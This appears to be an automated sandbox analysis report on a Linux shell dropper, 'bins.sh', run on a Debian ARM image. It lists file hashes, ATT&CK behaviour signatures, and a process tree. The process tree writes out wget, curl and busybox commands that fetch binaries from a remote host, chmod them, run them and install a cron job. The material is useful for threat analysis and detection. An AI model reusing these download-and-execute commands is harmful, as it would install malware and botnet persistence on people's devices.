Analysis
-
max time kernel
149s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
26/11/2024, 18:59
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
b36e5f7a0413ffa61828f903f44a98cd
-
SHA1
0ca86f60aa4fe5c5e0532a6cd3bd305cb5e43808
-
SHA256
38995805906e9f6f21572c75e0693f153afbd175ee83c7a53970f66e21f713b4
-
SHA512
6cd765121418db3017cf4e9ac35f6334b2fc669b53293005a6ee720adbafadab1072473923208647967e21e5ccdd7a8b365df453b05f19c6304ca66a1ca01a48
-
SSDEEP
96:YDnD7DM1f1ELBC5mBWLKCf39393afjUIExzoTvqm6yN2mQEL7Xs7L7XsG2zQMF3q:t6F04WW0zjEQr9OzsER204t
Malware Config
Signatures
-
Contacts a large (2083) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 797 chmod 809 chmod 678 chmod 785 chmod 791 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb 679 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb -
Renames itself 1 IoCs
pid Process 680 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.raA4QP crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/691/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/727/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/862/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/994/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/41/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/146/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/845/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/852/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/957/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/967/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/720/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/731/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/849/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/759/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/814/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/894/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/927/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/929/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/42/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/735/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/756/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/771/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/870/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/875/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1031/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1035/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/filesystems crontab File opened for reading /proc/749/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/742/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/751/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/797/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/941/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1037/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/15/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/299/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/900/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1049/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/938/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/940/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1007/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1024/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1026/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/698/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/896/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/869/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/933/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/983/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1051/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/747/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/855/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/737/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/859/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1028/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1032/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/19/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/599/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/854/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/915/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/932/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/945/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/988/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/1039/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/95/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb File opened for reading /proc/740/cmdline 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb -
System Network Configuration Discovery 1 TTPs 16 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 677 busybox 691 curl 776 busybox 802 curl 813 wget 659 curl 789 curl 790 busybox 794 wget 690 wget 800 wget 808 busybox 654 wget 788 wget 795 curl 796 busybox -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb2⤵
- System Network Configuration Discovery
PID:654
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:659
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb2⤵
- System Network Configuration Discovery
PID:677
-
-
/bin/chmodchmod 777 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb./8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:679 -
/bin/shsh -c "crontab -l"3⤵PID:681
-
/usr/bin/crontabcrontab -l4⤵PID:682
-
-
-
/bin/shsh -c "crontab -"3⤵PID:684
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:685
-
-
-
-
/bin/rmrm 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb2⤵PID:687
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY2⤵
- System Network Configuration Discovery
PID:690
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY2⤵
- System Network Configuration Discovery
PID:691
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY2⤵
- System Network Configuration Discovery
PID:776
-
-
/bin/chmodchmod 777 GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY./GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY2⤵PID:786
-
-
/bin/rmrm GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY2⤵PID:787
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ2⤵
- System Network Configuration Discovery
PID:788
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ2⤵
- System Network Configuration Discovery
PID:790
-
-
/bin/chmodchmod 777 eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ./eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ2⤵PID:792
-
-
/bin/rmrm eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ2⤵PID:793
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo2⤵
- System Network Configuration Discovery
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo2⤵
- System Network Configuration Discovery
PID:796
-
-
/bin/chmodchmod 777 wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo./wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo2⤵PID:798
-
-
/bin/rmrm wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo2⤵PID:799
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf./40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf2⤵PID:811
-
-
/bin/rmrm 40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6h6MVlCJshDxmomNotsocz6RjWoYOJBihC2⤵
- System Network Configuration Discovery
PID:813
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5c4a081a63dcc5ebce2f26b66f0ea672b
SHA1c10493b606407890addb547db4a4c1fe1875c59a
SHA256be05433ca7dbde044d339a4ed4bbcf187ff527dd8931b236cbf5ed6043754885
SHA5124b0ba16ba46f1690b87f279413bbaa71191839c6d866c447c3826c25ee4a9c721499874ffd326133612cb113a3fcd40669256c8d8ad3fb324b383c4a0d9b1076